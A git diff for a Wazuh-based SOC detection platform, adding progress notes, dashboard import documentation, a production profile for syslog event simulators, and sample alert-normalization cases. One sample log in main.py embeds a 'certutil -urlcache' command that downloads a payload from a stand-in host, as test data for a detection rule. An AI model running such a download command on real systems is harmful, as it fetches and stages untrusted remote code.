rule update

overall.md

@@ -0,0 +1,168 @@
+# Overall Project Checklist vs Proposal (Revision)
+
+Reference: `Security Detection & Threat Intelligence Enhancement Proposal-revise.md`
+Updated: March 4, 2026
+
+Legend:
+- `[x]` Completed
+- `[~]` Partially completed / in progress
+- `[ ]` Not started
+
+## 1) Architecture & Core Platform
+
+- [x] Detection layer (Wazuh) deployed and integrated
+  - Evidence: `wazuh-docker/single-node/docker-compose.yml`, `compose-overrides/wazuh.shared-network.yml`
+- [x] Automation layer (Shuffle) integrated
+  - Evidence: `Shuffle/docker-compose.yml`, `scripts/update-shuffle-workflow-from-template.sh`
+- [x] Case management integrated (IRIS-web used in implementation)
+  - Evidence: `soc-integrator/app/adapters/iris.py`, `soc-integrator/app/main.py` (`/iris/tickets`)
+- [x] Escalation path (PagerDuty stub in MVP) integrated
+  - Evidence: `compose-overrides/pagerduty.stub.yml`, `soc-integrator/app/adapters/pagerduty.py`
+- [x] Orchestration/API layer (`soc-integrator`) operational
+  - Evidence: `soc-integrator/app/main.py`, `soc-integrator/app/routes/mvp.py`
+
+Note: Proposal mentions DFIRTrack in architecture section; current implementation uses IRIS-web.
+
+## 2) Scope of Work (Section 3)
+
+### 2.1 Create & Tune New Detection Rules / Use Cases
+
+- [x] Baseline rules/decoders for proposal use cases added
+  - Evidence:
+    - `wazuh-docker/single-node/config/wazuh_cluster/local_decoder.xml`
+    - `wazuh-docker/single-node/config/wazuh_cluster/local_rules.xml`
+    - `wazuh-docker/single-node/config/wazuh_cluster/rules/soc-a1-ioc-rules.xml`
+    - `wazuh-docker/single-node/config/wazuh_cluster/rules/soc-a2-fortigate-fw-rules.xml`
+    - `wazuh-docker/single-node/config/wazuh_cluster/rules/soc-a3-fortigate-vpn-rules.xml`
+    - `wazuh-docker/single-node/config/wazuh_cluster/rules/soc-a4-windows-ad-rules.xml`
+- [~] Tuning against real production traffic
+  - Status: simulator/UAT-oriented tuning done; production false-positive tuning remains
+
+### 2.2 IOC Detection (DNS / Firewall / IDS-IPS)
+
+- [x] IOC enrichment/evaluation APIs implemented
+  - Evidence: `soc-integrator/app/main.py` (`/ioc/enrich`, `/ioc/evaluate`, `/ioc/history`)
+- [x] VirusTotal and AbuseIPDB integrations implemented
+  - Evidence: `soc-integrator/app/adapters/virustotal.py`, `soc-integrator/app/adapters/abuseipdb.py`
+- [x] IOC trace persistence implemented
+  - Evidence: `soc-integrator/app/repositories/mvp_repo.py` (`ioc_trace` methods)
+- [~] Scheduled IOC feed lifecycle hardening for production
+  - Status: core IOC workflow exists; production feed governance/SLAs still to finalize
+
+### 2.3 VPN Authentication Success from Outside Thailand
+
+- [x] MVP VPN evaluate flow implemented
+  - Evidence: `soc-integrator/app/routes/mvp.py` (`/mvp/vpn/evaluate`), `soc-integrator/app/services/mvp_service.py`
+- [x] GeoIP enrichment capability implemented
+  - Evidence: `soc-integrator/app/adapters/geoip.py`, `soc-integrator/app/main.py` (`/geoip/{ip}`)
+- [~] Production exception list and policy hardening
+  - Status: policy framework exists; enterprise exception governance pending
+
+## 3) End-to-End Workflow & Integration Deliverables (Section 4 / 4.1)
+
+- [x] Wazuh -> soc-integrator pipeline implemented
+  - Evidence: `soc-integrator/app/main.py` (`/wazuh/sync-to-mvp`, `/mvp/incidents/ingest`)
+- [x] soc-integrator -> IRIS ticket/case creation implemented
+  - Evidence: `soc-integrator/app/main.py` (`/iris/tickets`)
+- [x] soc-integrator -> Shuffle workflow trigger implemented
+  - Evidence: `soc-integrator/app/main.py` (`/shuffle/workflows/{workflow_id}/execute`)
+- [x] soc-integrator -> PagerDuty stub escalation path implemented
+  - Evidence: `soc-integrator/app/adapters/pagerduty.py`, `/action/create-incident`
+
+## 4) Appendix A (Initial Scope Use Cases)
+
+- [x] A1 DNS/Firewall IOC coverage artifacts in place
+- [x] A2 FortiGate IPS/Firewall coverage artifacts in place
+- [x] A3 FortiGate VPN coverage artifacts in place
+- [x] A4 Windows/AD coverage artifacts in place
+  - Evidence: `wazuh-docker/single-node/config/wazuh_cluster/rules/soc-a*-*.xml`
+
+## 5) Appendix B (Optional Add-On)
+
+- [x] B1 VMware rule artifact present
+  - Evidence: `wazuh-docker/single-node/config/wazuh_cluster/rules/soc-b1-vmware-rules.xml`
+- [x] B2 Log loss monitoring implemented in soc-integrator
+  - Evidence: `soc-integrator/app/main.py` (`/monitor/log-loss/check`)
+- [x] B3 Sysmon rule artifact present
+  - Evidence: `wazuh-docker/single-node/config/wazuh_cluster/rules/soc-b3-sysmon-rules.xml`
+- [x] Appendix B simulation script added
+  - Evidence: `scripts/send-wazuh-proposal-appendix-b-events.sh`
+
+## 6) Appendix C (Future Enhancements)
+
+- [x] C1 implemented (impossible travel detection logic)
+  - Evidence: `soc-integrator/app/services/c_detection_service.py` (`C1-01`)
+- [x] C2 implemented (C2-01..C2-04)
+  - Evidence: `soc-integrator/app/services/c_detection_service.py`
+- [x] C3 implemented (C3-01..C3-04)
+  - Evidence: `soc-integrator/app/services/c_detection_service.py`
+- [x] Appendix C simulator added
+  - Evidence: `scripts/send-wazuh-proposal-appendix-c-events.sh`
+- [ ] C4 ransomware early warning use cases
+- [ ] C5 endpoint/server anomaly use cases
+- [ ] C6 cloud/SaaS monitoring use cases
+- [ ] C7 SOC maturity monitoring use cases
+
+## 7) Dashboards, UI, and Operations
+
+- [x] Wazuh dashboard import automation added
+  - Evidence: `scripts/import-wazuh-dashboard.sh`, `scripts/events/*.ndjson`
+- [x] SOC Integrator UI implemented with monitoring and controls
+  - Evidence: `soc-integrator/app/ui/index.html`, `soc-integrator/app/ui/assets/app.js`
+- [x] Sim run control in UI (start/stop/logs)
+  - Evidence: `/sim/logs/start`, `/sim/logs/stop/{run_id}`, `/sim/logs/stop-running`, `/sim/logs/output/{run_id}`
+- [x] Wazuh Live Correlation view in Systems tab
+  - Evidence: `/sim/logs/wazuh-latest/{run_id}` + Systems UI section
+- [x] GeoIP lookup API and UI tab
+  - Evidence: `soc-integrator/app/main.py` (`/geoip/{ip}`), GeoIP tab in `/ui`
+
+## 8) Remaining Work for Production-Ready Acceptance
+
+- [~] Replace/augment lab-only assumptions (PagerDuty stub -> production PagerDuty)
+- [~] Production-grade tuning on real logs (A/B/C false positives and thresholds)
+- [~] Finalize runbooks, SLA/ownership, and exception governance
+- [~] Harden frontend dependency reliability (current UI still references external CDN scripts)
+
+## 8.1) Latest Incremental Updates (March 4, 2026)
+
+- [x] Added production-profile simulator mode for proposal scripts
+  - Evidence:
+    - `scripts/send-wazuh-proposal-required-events.sh` (`--profile=production`)
+    - `scripts/send-wazuh-proposal-appendix-b-events.sh` (`--profile=production`)
+- [x] Expanded normalization test support in SOC Integrator
+  - Evidence:
+    - `soc-integrator/app/main.py` (`GET /ingest/wazuh-alert/samples`)
+    - `soc-integrator/app/main.py` (`POST /ingest/wazuh-alert` now includes `normalized_event`)
+- [x] C1 normalization aligned to production log characteristics
+  - Evidence:
+    - `soc-integrator/app/services/mvp_service.py` (production-first C1 event typing)
+- [~] Production rule validation in Wazuh (`110xxx`) currently constrained by manager runtime instability during lab restarts
+  - Status: ingestion works; deterministic decoder/rule verification requires stable manager window.
+
+## 9) Quick Status Summary
+
+- Completed foundation and integration: **Yes**
+- Appendix A initial-scope implementation artifacts: **Present**
+- Appendix B optional add-ons: **Largely implemented in lab**
+- Appendix C future enhancements: **C1-C3 implemented; C4-C7 pending**
+- Primary gap: **production hardening, governance, and operations finalization**
+
+## 10) Mermaid: SOC Integrator C1-C3 Normalization
+
+```mermaid
+sequenceDiagram
+    participant W as Wazuh
+    participant SI as SOC Integrator API
+    participant N as normalize_wazuh_hit
+    participant C as C-Detection Service
+    participant DB as Postgres
+    participant IR as IRIS/Automation
+
+    W->>SI: Raw alert (_source.full_log, rule, agent)
+    SI->>N: Normalize raw alert
+    N-->>SI: Normalized event (asset/network/payload/risk_context)
+    SI->>C: Evaluate C1-C3 use cases
+    C->>DB: Store c_detection_events + evidence
+    C-->>SI: Matches + severity + reasoning
+    SI->>IR: Optional incident/ticket workflow
+```

progress-update.md

@@ -258,6 +258,71 @@ Project: FoodProject SOC Platform (Wazuh + Shuffle + IRIS-web + SOC Integrator)
 #### Operational scripts
 
 - `scripts/send-wazuh-test-events.sh`
+
+---
+
+Date: March 4, 2026
+Project: FoodProject SOC Platform (Wazuh + Shuffle + IRIS-web + SOC Integrator)
+
+## Incremental Progress Since Previous Update (March 4, 2026)
+
+### 1) Production-Profile Simulator Payloads
+
+- Added production payload mode to proposal simulators:
+  - `scripts/send-wazuh-proposal-required-events.sh`
+  - `scripts/send-wazuh-proposal-appendix-b-events.sh`
+- New argument:
+  - `--profile=simulation|production` (default remains `simulation`)
+- In `production` profile, simulator messages omit `section/usecase_id/usecase` markers and emit production-like key/value fields to support real parser/decoder testing.
+
+### 2) Wazuh Normalize API Improvements
+
+- Enhanced `POST /ingest/wazuh-alert` in `soc-integrator`:
+  - returns both legacy normalized shape and SOC normalized event shape.
+- Added `GET /ingest/wazuh-alert/samples` with practical sample request/response cases for:
+  - DNS IOC
+  - VMware auth
+  - Windows Sysmon
+  - C1 impossible travel
+
+### 3) C1 Normalization (Production-First)
+
+- Updated C1 normalization logic in:
+  - `soc-integrator/app/services/mvp_service.py`
+- C1 now maps from production characteristics (not only simulator markers):
+  - identity/vpn source context
+  - successful login/auth indicator
+  - user + source IP present
+  - geo context present (`country` and/or `src_lat/src_lon`)
+- Legacy `section/usecase_id` C1 markers are kept as fallback for backward compatibility.
+
+### 4) Current Validation Status
+
+- Production-profile simulator events are being sent to Wazuh successfully.
+- Some runs still show only base-rule matching during verification due to current Wazuh manager runtime instability in lab (intermittent restart/init issues), which affects deterministic decoder/rule validation windows.
+- Next validation step after stable manager window:
+  - re-run production-profile A1/B1/B2/B3 batches
+  - confirm `110xxx` production rules with consistent hit evidence.
+
+### 5) Mermaid Diagram: C1-C3 Normalization Flow (SOC Integrator)
+
+```mermaid
+flowchart LR
+    A[Wazuh Raw Alert<br/>full_log + rule + agent] --> B[POST /wazuh/sync-to-mvp<br/>or /ingest/wazuh-alert]
+    B --> C[mvp_service.normalize_wazuh_hit]
+    C --> D[KV parse from full_log<br/>src_ip user country event_type]
+    D --> E[Normalized Event Schema<br/>source event_type timestamp severity<br/>asset network payload risk_context]
+
+    E --> F{C-Detection Evaluate}
+    F --> C1[C1 Impossible Travel<br/>geo context + success login + user/src_ip]
+    F --> C2[C2 Credential Abuse<br/>off-hours / dormant / service interactive / rapid privilege]
+    F --> C3[C3 Lateral Movement<br/>multi-host auth / SMB-RDP burst / internal scan]
+
+    C1 --> G[Persist c_detection_events]
+    C2 --> G
+    C3 --> G
+    G --> H[Optional Incident Pipeline<br/>IRIS case + Shuffle + PagerDuty stub]
+```
 - `scripts/send-wazuh-endpoint-agent-test-events.sh`
 - additional simulation scripts under `scripts/` for firewall and endpoint scenarios with continuous mode enabled
 
@@ -571,3 +636,91 @@ This update documents production log sources and required fields for Appendix C
 - Timestamp format is valid ISO-8601 after normalization
 - Sample events can be found in `wazuh-alerts-*` within expected ingestion latency
 - At least one C-use-case evaluation run confirms source contributes to detection context
+
+---
+
+Date: March 4, 2026
+Project: FoodProject SOC Platform (Wazuh + Shuffle + IRIS-web + SOC Integrator)
+
+## Git Diff Progress Summary (Base: `0de071e` -> Head: `5e215c0`)
+
+### Diff Snapshot
+
+- Base commit: `0de071e7c9327c8c9135f0c15cf80c31c9b2e59a`
+- Head commit: `5e215c0`
+- Net change: **40 files changed, 6083 insertions(+), 108 deletions(-)**
+
+### Major Progress Areas
+
+1. SOC Integrator Expansion
+
+- Added full admin UI stack:
+  - `soc-integrator/app/ui/index.html`
+  - `soc-integrator/app/ui/assets/app.js`
+  - `soc-integrator/app/ui/assets/styles.css`
+- Added Appendix C correlation/detection service:
+  - `soc-integrator/app/services/c_detection_service.py`
+- Extended API/data layers for monitoring, simulation control, IOC, and detection history:
+  - `soc-integrator/app/main.py`
+  - `soc-integrator/app/models.py`
+  - `soc-integrator/app/repositories/mvp_repo.py`
+- Added GeoIP adapter integration:
+  - `soc-integrator/app/adapters/geoip.py`
+
+2. Wazuh Simulation and Dashboard Delivery
+
+- Added Appendix-specific event generators:
+  - `scripts/send-wazuh-proposal-appendix-b-events.sh`
+  - `scripts/send-wazuh-proposal-appendix-c-events.sh`
+- Added dashboard artifacts/import pipeline:
+  - `scripts/events/*.ndjson`
+  - `scripts/import-wazuh-dashboard.sh`
+- Added Wazuh custom decoder/rules artifacts for proposal scenarios:
+  - `wazuh-docker/single-node/config/wazuh_cluster/local_decoder.xml`
+  - `wazuh-docker/single-node/config/wazuh_cluster/local_rules.xml`
+  - `wazuh-docker/single-node/config/wazuh_cluster/rules/soc-*.xml`
+
+### Wazuh Custom Rules Added (Current Active Set)
+
+Active custom rules are currently defined in:
+- `wazuh-docker/single-node/config/wazuh_cluster/local_rules.xml`
+
+Rule groups/ranges implemented:
+- Base and appendix classifiers:
+  - `100200`: base marker for synthetic SOC events (`soc_mvp_test=true`)
+  - `100210`: Appendix A classifier
+  - `100220`: Appendix B classifier
+  - `100230`: Appendix C classifier
+- Appendix A:
+  - `A1` IOC/DNS: `100301-100302`
+  - `A2` FortiGate firewall/IPS/IDS: `100311-100320`
+  - `A3` VPN anomalies: `100331-100335`
+  - `A4` Windows/AD behaviors: `100341-100364`
+- Appendix B:
+  - `B1` VMware/vCenter/ESXi: `100401-100403`
+  - `B2` Log-loss monitor signal: `100411`
+  - `B3` Sysmon-focused detections: `100421-100426`
+- Appendix C (implemented scope C1-C3):
+  - `C1` Impossible travel: `100501`
+  - `C2` Credential abuse/privilege misuse: `100511-100514`
+  - `C3` Lateral movement/internal recon: `100521-100524`
+
+Operational note:
+- Split rule files under `wazuh_cluster/rules/soc-*.xml` exist as staging artifacts in this workspace; active detection content is loaded from `local_rules.xml`.
+
+3. Operations and Runtime Hardening
+
+- Updated orchestration and runtime configuration:
+  - `run-combined-stack.sh`
+  - `compose-overrides/soc-integrator.yml`
+  - `soc-integrator/Dockerfile`
+  - `soc-integrator/.env.example`
+
+### Documentation Progress Included in This Range
+
+- Added/updated proposal revision document:
+  - `Security Detection & Threat Intelligence Enhancement Proposal-revise.md`
+- Expanded progress log coverage in this file (`progress-update.md`) including:
+  - Appendix C (C1-C3) production log mapping
+  - Production data onboarding checklist
+  - Acceptance criteria for source onboarding and validation

scripts/README.md

@@ -1,5 +1,18 @@
 # Test Event Scripts
 
+## SOC Integrator UI (`Run Sim Logs`) target mapping
+
+`/ui -> Systems -> Run Sim Logs` now supports **multi-select Target** values based on selected `Script`.
+The UI starts one simulator run per selected target (except `all`, which runs a single `all` run).
+
+- `fortigate`: `all`, `501E`, `80F`, `60F`, `40F`
+- `endpoint`: `all`, `windows`, `mac`, `linux`
+- `cisco`: `all`, `asa_acl_deny`, `asa_vpn_auth_fail`, `ios_login_fail`, `ios_config_change`
+- `proposal_required`: `all`, `a1`, `a2`, `a3`, `a4`
+- `proposal_appendix_b`: `all`, `b1`, `b2`, `b3`
+- `proposal_appendix_c`: `all`, `c1`, `c2`, `c3`
+- `wazuh_test`: `all`, `ioc_dns`, `ioc_ips`, `vpn_outside_th`, `windows_auth_fail`
+
 ## Send Wazuh test events
 
 Use this to inject synthetic SOC events via syslog UDP into Wazuh manager.
@@ -342,3 +355,71 @@ scripts/import-wazuh-dashboard.sh scripts/events/wazuh-fortigate-sim-dashboard.n
 After import, open dashboard:
 
 - `SOC FortiGate Simulation Overview`
+
+## Wazuh dashboard files (detailed)
+
+Dashboard saved objects are stored in `scripts/events/*.ndjson`.
+
+- `scripts/events/wazuh-fortigate-sim-dashboard.ndjson`
+  - Title: `SOC FortiGate Simulation Overview`
+  - Purpose: FortiGate simulation visibility (events over time, top devices, top event types, severity).
+  - Typical data source: `scripts/send-wazuh-fortigate-test-events.sh`
+
+- `scripts/events/wazuh-client-agents-dashboard.ndjson`
+  - Title: `SOC Client Agent Simulation Overview`
+  - Purpose: Endpoint simulation visibility for Windows/macOS/Linux agent logs.
+  - Typical data source: `scripts/send-wazuh-endpoint-agent-test-events.sh`
+
+- `scripts/events/wazuh-proposal-required-dashboard.ndjson`
+  - Title: `SOC Proposal Required Logs Overview`
+  - Purpose: Appendix A required-scope logs (A1-A4).
+  - Typical data source: `scripts/send-wazuh-proposal-required-events.sh`
+
+- `scripts/events/wazuh-proposal-appendix-ab-dashboard.ndjson`
+  - Title: `SOC Proposal Appendix A+B Overview`
+  - Purpose: Combined Appendix A and B overview, including use-case table.
+  - Typical data sources:
+    - `scripts/send-wazuh-proposal-required-events.sh`
+    - `scripts/send-wazuh-proposal-appendix-b-events.sh`
+
+- `scripts/events/wazuh-proposal-appendix-c-dashboard.ndjson`
+  - Title: `SOC Proposal Appendix C Overview`
+  - Purpose: Appendix C MVP scope visibility (currently C1-C3 coverage).
+  - Typical data source: `scripts/send-wazuh-proposal-appendix-c-events.sh`
+
+- `scripts/events/wazuh-proposal-custom-rules-dashboard.ndjson`
+  - Title: `SOC Proposal Custom Rules Overview`
+  - Purpose: Monitor custom proposal rules (e.g., 1003xx/1004xx families), severity, and top descriptions.
+  - Typical data source: Any simulation script that triggers proposal custom rules.
+
+### Import any dashboard file
+
+```bash
+scripts/import-wazuh-dashboard.sh scripts/events/<dashboard-file>.ndjson
+```
+
+Examples:
+
+```bash
+scripts/import-wazuh-dashboard.sh scripts/events/wazuh-client-agents-dashboard.ndjson
+scripts/import-wazuh-dashboard.sh scripts/events/wazuh-proposal-required-dashboard.ndjson
+scripts/import-wazuh-dashboard.sh scripts/events/wazuh-proposal-appendix-ab-dashboard.ndjson
+scripts/import-wazuh-dashboard.sh scripts/events/wazuh-proposal-appendix-c-dashboard.ndjson
+scripts/import-wazuh-dashboard.sh scripts/events/wazuh-proposal-custom-rules-dashboard.ndjson
+```
+
+Optional overrides:
+
+```bash
+WAZUH_DASHBOARD_URL=https://localhost \
+WAZUH_DASHBOARD_USER=admin \
+WAZUH_DASHBOARD_PASS=SecretPassword \
+OVERWRITE=true \
+scripts/import-wazuh-dashboard.sh scripts/events/wazuh-proposal-required-dashboard.ndjson
+```
+
+### Quick troubleshooting
+
+- Verify index pattern has data in Discover: `wazuh-alerts-*`.
+- Set time range wide enough (for example `Last 24 hours`).
+- If charts are empty but raw logs exist, re-import the latest NDJSON and refresh index fields.

scripts/send-wazuh-proposal-appendix-b-events.sh

@@ -14,15 +14,19 @@ DELAY="${3:-0.3}"
 EVENT_DELAY="${EVENT_DELAY:-0.05}"
 DRY_RUN="${DRY_RUN:-0}"
 FOREVER="false"
+PROFILE="${PROFILE:-simulation}"
 
 for arg in "${@:4}"; do
   case "${arg}" in
     --forever)
       FOREVER="true"
       ;;
+    --profile=*)
+      PROFILE="${arg#*=}"
+      ;;
     *)
       echo "error: unexpected argument '${arg}'"
-      echo "usage: scripts/send-wazuh-proposal-appendix-b-events.sh [selector] [count] [delay_seconds] [--forever]"
+      echo "usage: scripts/send-wazuh-proposal-appendix-b-events.sh [selector] [count] [delay_seconds] [--forever] [--profile=simulation|production]"
       exit 1
       ;;
   esac
@@ -52,6 +56,11 @@ if ! [[ "${EVENT_DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
   exit 1
 fi
 
+if [[ "${PROFILE}" != "simulation" && "${PROFILE}" != "production" ]]; then
+  echo "error: profile must be simulation or production"
+  exit 1
+fi
+
 rand_public_ip() {
   if [[ $((RANDOM % 2)) -eq 0 ]]; then
     echo "198.51.100.$((RANDOM % 240 + 10))"
@@ -113,7 +122,13 @@ emit_b_usecase() {
 
   selector_matches "${id}" "${section}" || return 0
 
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${host} soc_mvp_test=true source=${source} section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\" ${body}"
+  local tags
+  if [[ "${PROFILE}" == "production" ]]; then
+    tags="soc_mvp_test=true source=${source} severity=${severity}"
+  else
+    tags="soc_mvp_test=true source=${source} section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\""
+  fi
+  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${host} ${tags} ${body}"
   sleep "${EVENT_DELAY}"
 }
 
@@ -194,7 +209,7 @@ emit_selected_set() {
 }
 
 echo "starting proposal Appendix B log simulator"
-echo "selector=${SELECTOR} count=${COUNT} delay=${DELAY}s event_delay=${EVENT_DELAY}s dry_run=${DRY_RUN}"
+echo "selector=${SELECTOR} count=${COUNT} delay=${DELAY}s event_delay=${EVENT_DELAY}s dry_run=${DRY_RUN} profile=${PROFILE}"
 echo "target=${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
 
 if [[ "${FOREVER}" == "true" ]]; then

scripts/send-wazuh-proposal-required-events.sh

@@ -14,15 +14,19 @@ DELAY="${3:-0.3}"
 EVENT_DELAY="${EVENT_DELAY:-0.05}"
 DRY_RUN="${DRY_RUN:-0}"
 FOREVER="false"
+PROFILE="${PROFILE:-simulation}"
 
 for arg in "${@:4}"; do
   case "${arg}" in
     --forever)
       FOREVER="true"
       ;;
+    --profile=*)
+      PROFILE="${arg#*=}"
+      ;;
     *)
       echo "error: unexpected argument '${arg}'"
-      echo "usage: scripts/send-wazuh-proposal-required-events.sh [selector] [count] [delay_seconds] [--forever]"
+      echo "usage: scripts/send-wazuh-proposal-required-events.sh [selector] [count] [delay_seconds] [--forever] [--profile=simulation|production]"
       exit 1
       ;;
   esac
@@ -52,6 +56,11 @@ if ! [[ "${EVENT_DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
   exit 1
 fi
 
+if [[ "${PROFILE}" != "simulation" && "${PROFILE}" != "production" ]]; then
+  echo "error: profile must be simulation or production"
+  exit 1
+fi
+
 rand_public_ip() {
   if [[ $((RANDOM % 2)) -eq 0 ]]; then
     echo "198.51.100.$((RANDOM % 240 + 10))"
@@ -119,7 +128,13 @@ emit_fgt_usecase() {
 
   selector_matches "${id}" "${section}" || return 0
 
-  emit_syslog "<190>date=$(date '+%Y-%m-%d') time=$(date '+%H:%M:%S') devname=\"${FGT_DEVNAME}\" devid=\"${FGT_DEVID}\" eventtime=$(date +%s) vd=\"root\" soc_mvp_test=true source=fortigate section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\" ${body}"
+  local tags
+  if [[ "${PROFILE}" == "production" ]]; then
+    tags="soc_mvp_test=true source=fortigate severity=${severity}"
+  else
+    tags="soc_mvp_test=true source=fortigate section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\""
+  fi
+  emit_syslog "<190>date=$(date '+%Y-%m-%d') time=$(date '+%H:%M:%S') devname=\"${FGT_DEVNAME}\" devid=\"${FGT_DEVID}\" eventtime=$(date +%s) vd=\"root\" ${tags} ${body}"
   sleep "${EVENT_DELAY}"
 }
 
@@ -132,7 +147,13 @@ emit_dns_usecase() {
 
   selector_matches "${id}" "${section}" || return 0
 
-  emit_syslog "<189>$(date '+%b %d %H:%M:%S') ${DNS_HOST} soc_mvp_test=true source=dns section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\" ${body}"
+  local tags
+  if [[ "${PROFILE}" == "production" ]]; then
+    tags="soc_mvp_test=true source=dns severity=${severity}"
+  else
+    tags="soc_mvp_test=true source=dns section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\""
+  fi
+  emit_syslog "<189>$(date '+%b %d %H:%M:%S') ${DNS_HOST} ${tags} ${body}"
   sleep "${EVENT_DELAY}"
 }
 
@@ -145,7 +166,13 @@ emit_windows_usecase() {
 
   selector_matches "${id}" "${section}" || return 0
 
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\" ${body}"
+  local tags
+  if [[ "${PROFILE}" == "production" ]]; then
+    tags="soc_mvp_test=true source=windows severity=${severity}"
+  else
+    tags="soc_mvp_test=true source=windows section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\""
+  fi
+  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} ${tags} ${body}"
   sleep "${EVENT_DELAY}"
 }
 
@@ -308,7 +335,7 @@ emit_selected_set() {
 }
 
 echo "starting proposal-required log simulator"
-echo "selector=${SELECTOR} count=${COUNT} delay=${DELAY}s event_delay=${EVENT_DELAY}s dry_run=${DRY_RUN}"
+echo "selector=${SELECTOR} count=${COUNT} delay=${DELAY}s event_delay=${EVENT_DELAY}s dry_run=${DRY_RUN} profile=${PROFILE}"
 echo "target=${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
 
 if [[ "${FOREVER}" == "true" ]]; then

soc-integrator/app/main.py

@@ -9,6 +9,7 @@ from collections import deque
 from datetime import datetime, timedelta, timezone
 from pathlib import Path
 
+from psycopg import sql
 from fastapi import Depends, FastAPI, File, HTTPException, Request, UploadFile
 from fastapi.responses import FileResponse, Response
 from fastapi.staticfiles import StaticFiles
@@ -21,7 +22,7 @@ from app.adapters.shuffle import ShuffleAdapter
 from app.adapters.virustotal import VirusTotalAdapter
 from app.adapters.wazuh import WazuhAdapter
 from app.config import settings
-from app.db import init_schema
+from app.db import get_conn, init_schema
 from app.models import (
     ActionCreateIncidentRequest,
     ApiResponse,
@@ -447,13 +448,22 @@ async def health() -> ApiResponse:
     )
 
 
-@app.post(
-    "/ingest/wazuh-alert",
-    response_model=ApiResponse,
-    summary="Normalize Wazuh alert",
-    description="Normalize a raw Wazuh alert payload into the internal ingest shape.",
-)
-async def ingest_wazuh_alert(payload: WazuhIngestRequest) -> ApiResponse:
+def _build_wazuh_hit_from_ingest(payload: WazuhIngestRequest) -> dict[str, object]:
+    src_payload = dict(payload.payload or {})
+    src_payload.setdefault("@timestamp", datetime.now(timezone.utc).isoformat())
+    src_payload.setdefault("id", payload.alert_id)
+    src_payload.setdefault(
+        "rule",
+        {
+            "id": payload.rule_id or "unknown",
+            "level": payload.severity if payload.severity is not None else 5,
+            "description": payload.title or "Wazuh alert",
+        },
+    )
+    return {"_id": payload.alert_id or f"wazuh-{uuid.uuid4().hex[:12]}", "_source": src_payload}
+
+
+def _normalize_wazuh_ingest_payload(payload: WazuhIngestRequest) -> dict[str, object]:
     normalized = {
         "source": payload.source,
         "alert_id": payload.alert_id,
@@ -462,7 +472,93 @@ async def ingest_wazuh_alert(payload: WazuhIngestRequest) -> ApiResponse:
         "title": payload.title,
         "payload": payload.payload,
     }
-    return ApiResponse(data={"normalized": normalized})
+    hit = _build_wazuh_hit_from_ingest(payload)
+    normalized_event = mvp_service.normalize_wazuh_hit(hit)
+    return {
+        "normalized": normalized,
+        "normalized_event": normalized_event,
+    }
+
+
+@app.post(
+    "/ingest/wazuh-alert",
+    response_model=ApiResponse,
+    summary="Normalize Wazuh alert",
+    description="Normalize a raw Wazuh alert payload into both legacy ingest shape and SOC normalized event shape.",
+)
+async def ingest_wazuh_alert(payload: WazuhIngestRequest) -> ApiResponse:
+    return ApiResponse(data=_normalize_wazuh_ingest_payload(payload))
+
+
+@app.get(
+    "/ingest/wazuh-alert/samples",
+    response_model=ApiResponse,
+    summary="Sample normalization cases",
+    description="Return sample Wazuh event-log cases with expected normalized output for testing and integration.",
+)
+async def ingest_wazuh_alert_samples() -> ApiResponse:
+    sample_payloads = [
+        WazuhIngestRequest(
+            source="wazuh",
+            rule_id="110302",
+            alert_id="sample-a1-02",
+            severity=8,
+            title="A1 production: DNS IOC domain match event",
+            payload={
+                "@timestamp": datetime.now(timezone.utc).isoformat(),
+                "full_log": "Mar 04 09:42:24 dns-fw-01 soc_mvp_test=true source=dns severity=medium event_type=ioc_domain_match src_ip=10.12.132.85 ioc_type=domain ioc_value=ioc-2080.malicious.example feed=threatintel_main confidence=high action=alert",
+                "agent": {"name": "dns-fw-01", "id": "001"},
+            },
+        ),
+        WazuhIngestRequest(
+            source="wazuh",
+            rule_id="110402",
+            alert_id="sample-b1-02",
+            severity=8,
+            title="B1 production: ESXi SSH enabled",
+            payload={
+                "@timestamp": datetime.now(timezone.utc).isoformat(),
+                "full_log": "Mar 04 09:42:28 esxi-01 soc_mvp_test=true source=vmware severity=medium event_type=vmware_esxi_enable_ssh action=enable service=ssh user=root host=esxi-01 src_ip=203.0.113.115",
+                "agent": {"name": "esxi-01", "id": "002"},
+            },
+        ),
+        WazuhIngestRequest(
+            source="wazuh",
+            rule_id="110426",
+            alert_id="sample-b3-06",
+            severity=8,
+            title="B3 production: CertUtil download pattern",
+            payload={
+                "@timestamp": datetime.now(timezone.utc).isoformat(),
+                "full_log": "Mar 04 09:42:35 win-sysmon-01 soc_mvp_test=true source=windows_sysmon severity=medium event_type=sysmon_certutil_download event_id=1 process=certutil.exe cmdline=\"certutil -urlcache -split -f http://198.51.100.22/payload.bin payload.bin\" src_ip=10.10.10.5",
+                "agent": {"name": "win-sysmon-01", "id": "003"},
+            },
+        ),
+        WazuhIngestRequest(
+            source="wazuh",
+            rule_id="110501",
+            alert_id="sample-c1-01",
+            severity=12,
+            title="C1 production: Impossible travel",
+            payload={
+                "@timestamp": datetime.now(timezone.utc).isoformat(),
+                "full_log": "Mar 04 09:44:10 fgt-vpn-01 source=vpn severity=high event_type=vpn_login_success event_id=4624 success=true user=alice.admin src_ip=8.8.8.8 country=US src_lat=37.3861 src_lon=-122.0839 dst_host=vpn-gw-01",
+                "agent": {"name": "fgt-vpn-01", "id": "004"},
+            },
+        ),
+    ]
+
+    cases = []
+    for item in sample_payloads:
+        cases.append(
+            {
+                "name": str(item.alert_id),
+                "request": item.model_dump(mode="json"),
+                "result": _normalize_wazuh_ingest_payload(item),
+            }
+        )
+
+    return ApiResponse(data={"cases": cases, "count": len(cases)})
 
 
 @app.post(
